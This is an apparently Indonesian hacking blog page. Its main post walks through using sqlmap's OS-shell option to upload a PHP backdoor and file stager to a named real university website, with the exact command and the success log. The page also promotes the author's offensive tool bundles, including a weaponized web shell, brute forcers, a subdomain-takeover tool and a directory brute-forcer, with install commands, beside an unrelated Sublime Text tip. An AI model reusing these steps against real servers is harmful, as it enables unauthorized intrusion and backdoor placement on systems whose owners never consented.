Upload Shell dengan SQLMap


SQLMAP adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.

Sangat sering kita menggunakan sqlmap untuk injeksi sql untuk mendapatkan database server web. Di artikel kali ini saya akan menunjukkan cara mengupload backdoor melalui SQLMAP.




  • Ketik command berikut untuk mengakses OS SHELL server web.

  • sqlmap -u http://alquran.unissula.ac.id/alquran/previewbukhari.php\?id\=21 -D quran --os-shell


    Sebelumnya saya sudah mendapatkan nama database web tersebut.





  • SQLMAP akan memberi anda pilihan, Bahasa apa yang disupport oleh web server tersebut. Kalian pilih nomor 4 (PHP) atau cukup tekan ENTER.



  • [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/' - http://alquran.unissula.ac.id:80/tmpujmew.php





  • SQLMAP sukses mengupload backdoor. Sekarang kita buka file yang telah diupload.


  • Perhatikan bagian bawah.




  • Kita coba upload file melalui file uploader dari SQLMAP.

  • Saya membuat file beranama bay.txt


  • Sekarang kita cek file yang sudah kita upload.



  • Semua artikel yang ada di blog.abaykan.com adalah untuk pembelajaran. Penggunaan sebagai tindakan yang melanggar hukum, diluar tanggung jawab kami. Sampai jumpa di artikel selanjutnya.
    Share:

    Mengganti Warna Skema Sublime Text

    Mengganti Warna Skema Sublime Text.

    Sublime Text merupakan menu editor yang powerfull dan terkenal dikalangan para programmer, keunggulan sublime selain ringan juga dapat membantu pekerjaan para programmer dengan packages-packages yang dapat diinstall misalnya Sublimelinter, Emmet, dsb.

    Pada kesempatan kali ini, saya akan membahas cara mempercantik tampilan Sublime Text dengan cara merubah warna skema pada text editor tersebut.

    Multilang Color Scheme.

    Cukup cantik, bukan? Okee, mari kita ganti.

    Untuk memilih warna skema yang kalian inginkan, kalian bisa memilih nya di packagecontrol.io. Setelah memilih warna skema yang sesuai dengan keinginan kalian, sekarang waktunya memasang warna skema tersebut pada Sublime Text kalian.

    • Pilih warna skema yang menurut anda paling menarik di packagecontrol.io
    • Jika anda pengguna Mac, tekan ⌘ + Shift + P , untuk pengguna Windows dan lainnya cukup tekan Ctrl + Shif + P. Setelah itu ketikkan, Install Package
    • Lalu ketikkan nama warna skema yang kalian inginkan, (untuk warna skema saya diatas, saya menggunakan Dark_Legacy dari Multilang Color Scheme).
    • Setelah warna skema terinstall, selanjutnya klik menu Preferences lalu pilih Color Scheme, lalu pilih warna skema yang sudah kalian install tadi.
    • Warna skema anda telah berubah!

    Oke, saya rasa cukup untuk pembahasan Mengganti Warna Skema Sublime Text. Jika ada yang perlu ditanyakan, silahkan isi pertanyaan anda di kolom komentar. Semoga bermanfaat dan sampai jumpa di artikel berikutanya!
    Share:

    Summ0n3r - Summon your favourite tools.

    Summ0n3r - Summon your favourite tools.

    Script yang berbasis Python ini berguna untuk memanggil tools yang berguna bagi anda.


    Available Tools


  • CrawlBox - Easy way to bruteforce directory.
  • 53R3N17Y - Python based script for Information Gathering.
  • TrackOut - Python IP Tracker.
  • WPScan - Black box WordPress vulnerability Scanner.
  • TrackOut - Python IP Tracker.
  • Sub0ver - Hostile Subdomain Takeover Tool.
  • JoomScan - Detect and analysis Joomla CMS Vulnerability.
  • XBruteForcer - Brute Force Tool.
  • Findsploit - Find Exploits In Local And Online Databases.
  • SQLMap - Automatic SQL Injection and Database Takeover Tool
  • CUPP - Common User Passwords Profiler.
  • Weevely - Weaponized web shell.

  • Operating Systems Tested


  • OSX El Capitan 10.11
  • Ubuntu 16.04
  • Backbox 5
  • Kali Linux 2018.1

  • Install

    (as root)

  • git clone https://github.com/abaykan/Summ0n3r.git
  • cd Summ0n3r/
  • chmod +x summ0n3r
  • pip install -r requirements.txt
  • ./summ0n3r -h

  • Download Summ0n3r 

    Share:

    53R3N17Y ?? Tool Kok Alay!

    53R3N17Y

    Tool yang berbasis Python ini berguna untuk Reverse IP, Geo IP Lookup, Whois Lookup, Searching Host, Show HTTP Header, Find Shared DNS, Show HTTP Header. 


    Operating Systems Tested
    • MacOSX
    • Ubuntu 16.04
    • Backbox 5

    Install
    (as root)

      git clone https://github.com/abaykan/53R3N17Y.git
      cd 53R3N17Y/
      pip install -r requirements.txt
      ./serenity -h
    
    note: tested with python 2.7.6

    Share:

    CrawlBox - Easy Way to Brute-Force Web Directory.

    CrawlBox

    CrawlBox. - Tool ini berguna untuk menemukan halaman login,  index of / direktori, titik akses terbatas, subdomain, dan lainnya. CrawlBox mempunyai lebih dari 6000 wordlist sendiri untuk menemukan direktori tersembunyi dari sebuah web. Direktori yang berhasil ditemukan akan langsung dilaporkan beserta HTTP response code.

    Tested On

    • MacOSX
    • Linux

    Usage
    python crawlbox.py [-h] [-v] [-w WORDLIST] url
             Optional Arguments
    -h, --help show this help message and exit
    -v, --version show program's version number and exit
    -w WORDLIST specific path to wordlist file
    -d DELAY add delay between requests

    Example

              Web Site Scan With Internal Wordlist
    python crawlbox.py http://domain.com/
              Web Site Scan With External Wordlist
    python crawlbox.py -w wordlist.txt

    Install
    (as root)
    git clone https://github.com/abaykan/crawlbox.git
    cd crawlbox/
    pip install -r requirements.txt
    python crawlbox.py -h
    Share: